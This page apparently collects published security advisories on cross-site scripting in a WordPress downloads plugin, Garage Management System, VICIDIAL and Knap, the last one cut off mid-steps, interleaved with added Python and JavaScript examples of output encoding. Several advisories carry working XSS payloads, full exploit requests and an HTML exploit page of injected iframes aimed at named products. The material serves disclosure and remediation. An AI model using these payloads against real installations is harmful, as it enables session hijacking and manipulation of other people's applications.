/>&idcore-button-hover-background-color2=&idcore-button-hover-border-width=1&idcore-button-hover-border-style=solid&idcore-button-hover-border-radius=3<br />&idcore-button-hover-border-left=on&idcore-button-hover-border-top=on&idcore-button-hover-border-bottom=on&idcore-button-hover-border-right=on<br 
/>&idcore-button-hover-border-color=#d4150b&idcore-button-hover-shadow-size=small&idcore-button-hover-shadow-style=solid<br />&idcore-button-hover-shadow-color=rgba(68, 68, 68, 0.2)&idcore-button-active-inherit=on&idcore-button-active-text-family=Strait&idcore-button-active-text-size=20<br />&idcore-button-active-text-transform=uppercase&idcore-button-active-text-color=#ffffff&idcore-button-active-background-image=<br />&idcore-button-active-background-size=auto&idcore-button-active-background-hposition=left&idcore-button-active-background-vposition=top<br />&idcore-button-active-background-repeat=repeat&idcore-button-active-background-color=#d4150b&idcore-button-active-background-gradient=2shades<br />&idcore-button-active-background-color2=&idcore-button-active-border-width=1&idcore-button-active-border-style=solid&idcore-button-active-border-radius=3<br />&idcore-button-active-border-left=on&idcore-button-active-border-top=on&idcore-button-active-border-bottom=on&idcore-button-active-border-right=on<br />&idcore-button-active-border-color=#d4150b&idcore-button-active-shadow-size=small&idcore-button-active-shadow-style=solid<br />&idcore-button-active-shadow-color=rgba(68, 68, 68, 0.2)&idcore-button-active-transform=shift-down&idcore-amazon-access-key=&idcore-amazon-secret-key=<br />&idcore-amazon-bucket=&idcore-error-invalid-link=Invalid download link.&idcore-error-expired-link=Download link expired.<br />&idcore-error-no-file=File does not exist.&idcore-link-lifetime=72&idcore-csv-separator=;&idcore-cross-domain-enable=on&idcore-admin-menu-stats=on<br />&action=idcore-update-settings&idcore_version=2<br />-<br />POST: HTTP/1.1 200 OK<br />Server: Apache/2.4.18 (Ubuntu)<br />Access-Control-Allow-Origin: *<br />Content-Length: 68<br />Keep-Alive: timeout=5, max=96<br />Connection: Keep-Alive<br />Content-Type: text/html; charset=utf-8<br /><br /><br />Security Risk:<br />==============<br />The security risk of the persistent input validation web vulnerability in 
the stripe application and wordpress plugin is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br />Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com<br />Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab<br />Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php<br />Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code># Exploit Title: Garage Management System 1.0 - 'categoriesName' - Stored XSS<br /># Date: 18-09-2022<br /># Exploit Author: Sam Wallace<br /># Software Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html<br /># Version: 1.0<br /># Tested on: Debian<br /># CVE : CVE-2022-41358<br /><br />Summary:<br />Garage Management System relies on client-side validation to prevent XSS.<br />Using Burp, the request can be modified and replayed to the server, bypassing<br />this validation, which creates an avenue for stored XSS.<br /><br />Parameter: categoriesName<br />URI: /garage/php_action/createCategories.php<br /><br />POC:<br />POST /garage/php_action/createCategories.php HTTP/1.1<br />Host: 10.24.0.69<br />Content-Length: 367<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://10.24.0.69<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Referer: http://10.24.0.69/garage/add-category.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u<br />Connection: close<br /><br />------WebKitFormBoundaryqKDsN4gmatTEEkhS<br />Content-Disposition: form-data; name="categoriesName"<br /><br /><script>alert(1)</script><br />------WebKitFormBoundaryqKDsN4gmatTEEkhS<br />Content-Disposition: form-data; name="categoriesStatus"<br /><br />1<br />------WebKitFormBoundaryqKDsN4gmatTEEkhS<br />Content-Disposition: form-data; name="create"<br /><br /><br />------WebKitFormBoundaryqKDsN4gmatTEEkhS--<br /></code></pre>
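The Green Downloads button labels and the Garage Management System category name above are the same bug in two output contexts: a stored string is written into the page without encoding, and in the Garage case the only control in the way is client-side validation that a Burp replay skips entirely. The block below is an added example, not either vendor's code. The two `*_unsafe` functions are illustrative templates that mirror where the advisories show the values landing (a double-quoted `data-label` attribute plus the span text for Green Downloads, a table cell for Garage); the `*_safe` versions apply the encoding that matches each context, and the payloads are the ones the advisories used.

```python
"""Context-aware output encoding for the two stored-XSS advisories.

Added example, not the vendors' code. The *_unsafe functions mirror the
sinks the advisories show (Green Downloads: a double-quoted data-label
attribute and the button text; Garage Management System: a table cell);
the *_safe functions apply the encoding that fixes each context.
"""
import html
from html.parser import HTMLParser

# Payloads taken from the two advisories.
GREEN_DOWNLOADS_PAYLOAD = 'Buy Now:>"<iframe src=evil.source onload=alert(document.cookie)>'
GARAGE_PAYLOAD = "<script>alert(1)</script>"


def attr(value):
    """Encode for a double-quoted attribute value: &, <, >, " and '."""
    return html.escape(str(value), quote=True)


def text(value):
    """Encode for element content: &, < and > are what matter here."""
    return html.escape(str(value), quote=False)


def render_button_unsafe(label):
    # Vulnerable pattern: the stored label is concatenated straight into markup.
    return f'<span id="idcore-preview-button" data-label="{label}">{label}</span>'


def render_button_safe(label):
    return (f'<span id="idcore-preview-button" data-label="{attr(label)}">'
            f'{text(label)}</span>')


def render_category_unsafe(name):
    return f"<tr><td>{name}</td></tr>"


def render_category_safe(name):
    return f"<tr><td>{text(name)}</td></tr>"


class _Elements(HTMLParser):
    """Collect the element names a browser-like parser creates from markup."""
    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        self.names.append(tag)


def element_names(markup):
    parser = _Elements()
    parser.feed(markup)
    parser.close()
    return parser.names


def is_inert(markup, template_elements):
    """True when rendering created only the elements the template itself emits."""
    return set(element_names(markup)) <= set(template_elements)


if __name__ == "__main__":
    cases = (
        ("Green Downloads", render_button_unsafe, render_button_safe,
         GREEN_DOWNLOADS_PAYLOAD, {"span"}),
        ("Garage", render_category_unsafe, render_category_safe,
         GARAGE_PAYLOAD, {"tr", "td"}),
    )
    for name, unsafe, safe, payload, expected in cases:
        print(name, "unsafe inert:", is_inert(unsafe(payload), expected))
        print(name, "safe   inert:", is_inert(safe(payload), expected))
```

One caveat specific to the Green Downloads preview: the advisory's markup also keeps the labels in `data-label-*` attributes that a state-switching script reads back. Attribute encoding makes the stored string inert while it sits in the attribute, but the browser hands the decoded value to that script, so if the script copies it into the span with innerHTML the payload is parsed as markup again; it has to use textContent (or the server has to reject markup on input as well). Client-side validation of the kind the Garage entry describes is a usability feature, not a control, because the server sees whatever the replayed request contains.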
<pre><code>Document Title:<br />===============<br />Vicidial v2.14-783a - Multiple XSS Web Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2311<br /><br /><br />Release Date:<br />=============<br />2022-10-11<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2311<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.2<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Non Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />VICIDIAL is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act<br />as a complete inbound/outbound contact center suite with inbound email support as well. The agent interface is an<br />interactive set of web pages that work through a web browser to give real-time information and functionality with<br />nothing more than an internet browser on the client computer. The management interface is also web-based and<br />offers the ability to view many real-time and summary reports as well as many detailed campaign and agent options<br />and settings. VICIDIAL can function as an ACD for inbound calls or for Closer calls coming from VICIDIAL outbound<br />fronters and even allows for remote agents logging in from remote locations as well as remote agents that may only<br />have a phone. 
There are currently over 24,000 installations of VICIDIAL in production in over 100 countries around<br />the world, several with over 300 agent seats and many with multiple locations.<br /><br />(Copy of the Homepage: https://www.vicidial.org/vicidial.php )<br />(Download: https://www.vicidial.org/vicidial.php )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered multiple client-side cross site scripting vulnerabilities in the VICIDIAL v2.14-783a web-application.<br /><br />Affected Product(s):<br />====================<br />Vicidial Group<br />Product: Vicidial v2.14-783a - (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-01-15: Researcher Notification & Coordination (Security Researcher)<br />2022-01-16: Vendor Notification (Security Department)<br />2022-**-**: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements (Security Department)<br />2022-10-11: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Pre Auth (No Privileges or Session)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />Multiple non-persistent cross site scripting web vulnerabilities have been discovered in the official VICIDIAL v2.14-783a web-application.<br />The vulnerability allows remote attackers to inject malicious script code in post method 
requests to compromise user session data<br />or to manipulate application contents for clients.<br /><br />The vulnerabilities are located in the `end_date`, `query_date`, `shift`, `type`, `use_lists`, `search_archived_data`, `start_hour`, `end_hour`,<br />`stage`, `agent`, `user`, `db` parameters of the vulnerable `AST_IVRstats.php`, `AST_LISTS_pass_report.php`, `AST_user_group_hourly_detail.php`,<br />`AST_agent_time_sheet.php`, `AST_agent_days_detail.php`, `user_status.php`, `admin_lists_custom.php` and `admin.php` files. Remote attackers<br />are able to create specially crafted malicious links to execute client-side script code from the application context. The request method to inject<br />is GET and the attack vector is non-persistent. The identified web vulnerabilities are classic cross site scripting issues.<br /><br />Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to<br />malicious sources and non-persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] GET<br /><br />Vulnerable File(s):<br />[+] AST_IVRstats.php<br />[+] AST_LISTS_pass_report.php<br />[+] AST_user_group_hourly_detail.php<br />[+] AST_agent_time_sheet.php<br />[+] AST_agent_days_detail.php<br />[+] user_status.php<br />[+] admin_lists_custom.php<br />[+] admin.php<br /><br />Vulnerable Parameter(s):<br />[+] end_date<br />[+] query_date<br />[+] shift<br />[+] type<br />[+] use_lists<br />[+] search_archived_data<br />[+] start_hour<br />[+] end_hour<br />[+] stage<br />[+] agent<br />[+] user<br />[+] db<br /><br />Affected Module(s):<br />[+] Backend Administration Web UI (Agents, Managers & Admins)<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The client-side post inject web vulnerability can be exploited by remote attackers without an account and with low or medium user interaction.<br />For security demonstration or to reproduce 
the cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />Vulnerable Source: (PoC - IVR Report)<br /></td><td rowspan="2" valign="TOP"><br /><font size="2" face="ARIAL,HELVETICA" color="BLACK"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <a href="/vicidial_demo/AST_IVRstats.php?DB=&<br />type=inbound&query_date=2022-01-16&end_date=2022-01-16&query_date_D=2022-01-16&query_date_T=<br />&end_date_D=2022-01-16&end_date_T=&shift=[MALICIOUS SCRIPT CODE EXECUTION POINT!]"><iframe src="evil.source" onload="alert(document.domain)"></iframe><br />&file_download=1&search_archived_data=">DOWNLOAD</a> | <a href="./admin.php?ADD=3111&group_id=">MODIFY</a> |<br /><a href="./admin.php?ADD=999999">REPORTS</a> | <a href="./AST_CLOSERstats.php?query_date=2022-01-16&<br />end_date=2022-01-16&shift=">[MALICIOUS SCRIPT CODE EXECUTION POINT!]<iframe src="evil.source" onload="alert(document.domain)"></iframe>">CLOSER REPORT</a><br /></font><br /></td></tr><br /><br /><br />PoC: Payload<br /><iframe src=evil.source onload=alert(document.domain)></iframe><br /><br /><br />PoC: Vulnerable Parameters<br />https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=inbound&query_date=+00%3A00%3A00&end_date[XSS]+23%3A59%3A59&query_date_D=<br />&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL&report_display_type=HTML<br /><br />https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=inbound&query_date=[XSS]+00%3A00%3A00&end_date+23%3A59%3A59&query_date_D=<br />&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL&report_display_type=HTML<br /><br />https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=inbound&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59&query_date_D=<br />&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift[XSS]&report_display_type=HTML<br /><br 
/>https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=[XSS]&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59&query_date_D=<br />&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL&report_display_type=HTML<br /><br />https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=[XSS]&type=inbound&query_date=+00%3A00%3A00&end_date+23%3A59%3A59&query_date_D=<br />&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL&report_display_type=HTML<br /><br />https://vicidial.localhost:8080/vicidial/AST_LISTS_pass_report.php?DB=&use_lists=[XSS]&report_display_type=HTML&SUBMIT=SUBMIT<br />https://vicidial.localhost:8080/vicidial/admin.php?query_date[XSS]&end_date=2022-01-04&max_system_stats_submit=ADJUST+DATE+RANGE&ADD=999992&stage=TOTAL<br />https://vicidial.localhost:8080/vicidial/admin.php?query_date=2021-12-06&end_date=[XSS]&max_system_stats_submit=ADJUST+DATE+RANGE&ADD=999992&stage=TOTAL<br />https://vicidial.localhost:8080/vicidial/AST_user_group_hourly_detail.php?DB=&query_date=2022-01-04&start_hour=16&end_hour=16&SUBMIT=&search_archived_data=[XSS]<br />https://vicidial.localhost:8080/vicidial/AST_user_group_hourly_detail.php?DB=&query_date=2022-01-04&start_hour=[XSS]&end_hour=[XSS]&file_download=1&SUBMIT=&search_archived_data=<br />https://vicidial.localhost:8080/vicidial/AST_agent_time_sheet.php?query_date=[XSS]&agent=[XSS]&SUBMIT=SUBMIT<br />https://vicidial.localhost:8080/vicidial/user_status.php?user=[XSS]<br />https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=2022-01-15&end_date=2022-01-15&group[]=--ALL--&shift=[XSS]<br />https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=2022-01-15&end_date=[XSS]&group[]=--ALL--&shift=ALL<br />https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=[XSS]&end_date=2022-01-15&group[]=--ALL--&shift=ALL<br 
/>https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?DB=&query_date=2022-01-15&end_date=2022-01-15&group%5B%5D=0408&report_display_type=TEXT&user=[XSS]&shift=ALL&SUBMIT=SUBMIT<br />https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?query_date=2022-01-15&end_date=2022-01-15&shift=ALL&DB=&user=8178&group[]=0408&search_archived_data=&report_display_type=TEXT&stage=[XSS]<br />https://vicidial.localhost:8080/vicidial/AST_agent_time_sheet.php?query_date=2022-01-15&agent=[XSS]&SUBMIT=SUBMIT<br />https://vicidial.localhost:8080/vicidial/admin_lists_custom.php?action=DELETE_CUSTOM_FIELD_CONFIRMATION&list_id=108&field_id=133&field_label=idcliente&field_type=TEXT&field_duplicate=N&DB=[XSS]<br /><br /><br /><br />PoC: Exploitation<br /><html><br /><head><body><br /><title>vicidial xss exploit</title><br /><iframe src"https://vicidial.localhost:8080/vicidial/admin_lists_custom.php?action=DELETE_CUSTOM_FIELD_CONFIRMATION&list_id=108&field_id=133&field_label=idcliente<br />&field_type=TEXT&field_duplicate=N&DB=<iframe src=evil.source onload=alert(document.domain)></iframe>"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_time_sheet.php?query_date=2022-01-15&agent=<iframe src=evil.source onload=alert(document.domain)></iframe>&SUBMIT=SUBMIT"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?query_date=2022-01-15&end_date=2022-01-15&shift=ALL&DB=&user=8178&group[]=0408&search_archived_data=<br />&report_display_type=TEXT&stage=<iframe src=evil.source onload=alert(document.domain)></iframe>"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?DB=&query_date=2022-01-15&end_date=2022-01-15&group%5B%5D=0408&report_display_type=TEXT&user=<iframe src=evil.source onload=alert(document.domain)></iframe>&shift=ALL&SUBMIT=SUBMIT"></iframe><br /><iframe 
src"https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=<iframe src=evil.source onload=alert(document.domain)></iframe>&end_date=2022-01-15&group[]=--ALL--&shift=ALL"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=2022-01-15&end_date=<iframe src=evil.source onload=alert(document.domain)></iframe>&group[]=--ALL--&shift=ALL"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=2022-01-15&end_date=2022-01-15&group[]=--ALL--&shift=<iframe src=evil.source onload=alert(document.domain)></iframe>"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/user_status.php?user=<iframe src=evil.source onload=alert(document.domain)></iframe>"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_time_sheet.php?query_date=<iframe src=evil.source onload=alert(document.domain)></iframe>&agent=<iframe src=evil.source onload=alert(document.domain)></iframe>&SUBMIT=SUBMIT"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_user_group_hourly_detail.php?DB=&query_date=2022-01-04&start_hour=<iframe src=evil.source onload=alert(document.domain)></iframe><br />&end_hour=<iframe src=evil.source onload=alert(document.domain)></iframe>&file_download=1&SUBMIT=&search_archived_data="></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/admin.php?query_date=2021-12-06&end_date=<iframe src=evil.source onload=alert(document.domain)></iframe><br />&max_system_stats_submit=ADJUST+DATE+RANGE&ADD=999992&stage=TOTAL"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/admin.php?query_date<iframe src=evil.source onload=alert(document.domain)></iframe>&end_date=2022-01-04<br />&max_system_stats_submit=ADJUST+DATE+RANGE&ADD=999992&stage=TOTAL"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=<iframe src=evil.source 
onload=alert(document.domain)></iframe><br />&type=inbound&query_date=+00%3A00%3A00&end_date+23%3A59%3A59&query_date_D=&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL<br />&report_display_type=HTML"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=inbound&query_date=+00%3A00%3A00<br />&end_date<iframe src=evil.source onload=alert(document.domain)></iframe>+23%3A59%3A59&query_date_D=&query_date_T=00%3A00%3A00<br />&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL&report_display_type=HTML<br />"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=inbound&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59<br />&query_date_D=&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift<iframe src=evil.source onload=alert(document.domain)></iframe><br />&report_display_type=HTML"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=<br />&type=<iframe src=evil.source onload=alert(document.domain)></iframe>&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59&query_date_D=&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59<br />&shift=ALL&report_display_type=HTML"></iframe><br /></body></head><br /></html><br /><br /><br />Security Risk:<br />==============<br />The security risk of the cross site scripting web vulnerabilities in the vicidial web-application are estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ; https://www.vulnerability-db.com<br /><br /></code></pre>
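The three advisories on this page share one root cause: a user-controlled value (the Garage `categoriesName` field, the VICIDIAL GET parameters, the Knap `name` field) is written into HTML without context-aware output encoding, and in the Knap case also into the `knap.deleteAlert()` string inside an `onclick` attribute. The block below is an added example, not code from the advisories or from any of the affected projects; `escapeHtml`, `escapeJsString`, `isValidName`, `renderUserRow*` and `leaksMarkup` are hypothetical helpers written here, and the sample name is constructed from the payload quoted in the Knap advisory.

```javascript
// Added example (not from the advisories or the affected projects): context-aware
// output encoding for the XSS sinks described on this page. All function names
// are hypothetical helpers written for this example.

// Constructed sample input: the name payload quoted in the Knap advisory.
const SAMPLE_NAME =
  'Pippo"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe>';

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode for an HTML text node or a double-quoted attribute value. This is the
// fix for the reflected VICIDIAL parameters and for the stored Garage/Knap
// values wherever they are emitted as HTML.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Encode for a JavaScript string literal. Every non-alphanumeric character
// becomes \xHH or \uHHHH, so the output contains only [A-Za-z0-9\] and can
// close neither the JS string nor the HTML attribute carrying the handler.
function escapeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Server-side allow-list (Knap solution step 1, and the server-side check the
// Garage application only performed in the browser). Output encoding is still
// applied afterwards: validation narrows input, it does not replace encoding.
function isValidName(name) {
  return typeof name === 'string' && /^[\p{L}\p{N} .,'-]{1,64}$/u.test(name);
}

// Vulnerable rendering, shaped like the ./users row the Knap advisory quotes:
// the name is concatenated into a <td> and into the knap.deleteAlert() message
// inside an onclick attribute.
function renderUserRowVulnerable(id, name) {
  return `<td>${name}</td>` +
    `<a href="javascript:;" onclick="knap.deleteAlert('users',` +
    `'Are you sure you want to delete <strong>${name}</strong>?',${id})">Delete</a>`;
}

// Hardened rendering. The onclick value crosses three contexts: the dialog
// later inserts the message as HTML, the message is a JS string literal, and
// the literal sits in an HTML attribute. Encode innermost first: HTML-encode
// the name, then JS-escape the result. escapeJsString output is
// attribute-safe by construction, so no further attribute encoding is needed.
function renderUserRowSafe(id, name) {
  const safeId = Number(id);
  if (!Number.isInteger(safeId)) throw new TypeError('id must be an integer');
  const text = escapeHtml(name);
  const inHandler = escapeJsString(escapeHtml(name));
  return `<td>${text}</td>` +
    `<a href="javascript:;" onclick="knap.deleteAlert('users',` +
    `'Are you sure you want to delete <strong>${inHandler}</strong>?',${safeId})">Delete</a>`;
}

// Regression check: does the rendered markup still contain an injected tag
// (a real <iframe ...> element, or an onload= handler inside any tag)?
function leaksMarkup(html) {
  return /<iframe\b|<[a-z][^>]*\sonload\s*=/i.test(html);
}

function demo() {
  console.log('valid name?', isValidName(SAMPLE_NAME));                                    // false
  console.log('vulnerable leaks?', leaksMarkup(renderUserRowVulnerable(19, SAMPLE_NAME))); // true
  console.log('hardened leaks?', leaksMarkup(renderUserRowSafe(19, SAMPLE_NAME)));         // false
  console.log(renderUserRowSafe(19, SAMPLE_NAME));
}

if (typeof require !== 'undefined' && require.main === module) demo();
```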
<pre><code>Document Title:<br />===============<br />Knap (APL) v3.1.3 - Persistent Cross Site Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2307<br /><br /><br />Release Date:<br />=============<br />2022-10-10<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2307<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.7<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Knap is an advanced User Management software written in Laravel 5.4 (PHP Framework) that allows the admin to manage users.<br /><br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a persistent cross site web vulnerability in the Knap Advanced PHP Login v3.1.3 user management web-application.<br /><br /><br />Affected Product(s):<br />====================<br />ajay138<br />Product: Knap Advanced PHP Login v3.1.3 - User Management (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2021-09-03: Researcher Notification & Coordination (Security Researcher)<br />2021-09-04: Vendor Notification (Security Department)<br />2022-**-**: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements (Security Department)<br />2022-10-10: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br 
/>Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (User Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />A persistent input validation web vulnerability has been discovered in the Knap Advanced PHP Login v3.1.3 user management web-application.<br />The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application<br />requests from the application side.<br /><br />The persistent cross site web vulnerability is located in the name parameter of the Profile Account - Account Information module.<br />Remote attackers with low privileged user accounts are able to inject their own malicious script code as the name to provoke an execution<br />of the malicious content inside the users and activity log backend modules. The request method to inject is POST. 
The injection<br />points are the user create and update actions, and the execution of the malicious script code occurs in the activity log and users listings.<br /><br />Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects<br />to malicious sources and persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] POST<br /><br />Vulnerable Module(s):<br />[+] Register (Site)<br />[+] Update (Account Information)<br /><br />Vulnerable Input(s):<br />[+] Name<br /><br />Vulnerable Parameter(s):<br />[+] name<br /><br />Affected Module(s):<br />[+] ./users<br />[+] ./activity<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged user account and low user interaction.<br />For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />Manual steps to reproduce the vulnerability ...<br />1. Register as a user or get registered by the admin<br />2. Start your web browser and a session tamper or debug tool<br />3. Open the My Profile menu with the Profile Account information section<br />4. Change the name input to your script code test payload and save via submit (post)<br />Note: The injected payload executes successfully in the users list (backend) and within the activity log on history (backend) on preview by admins or mods<br />5. 
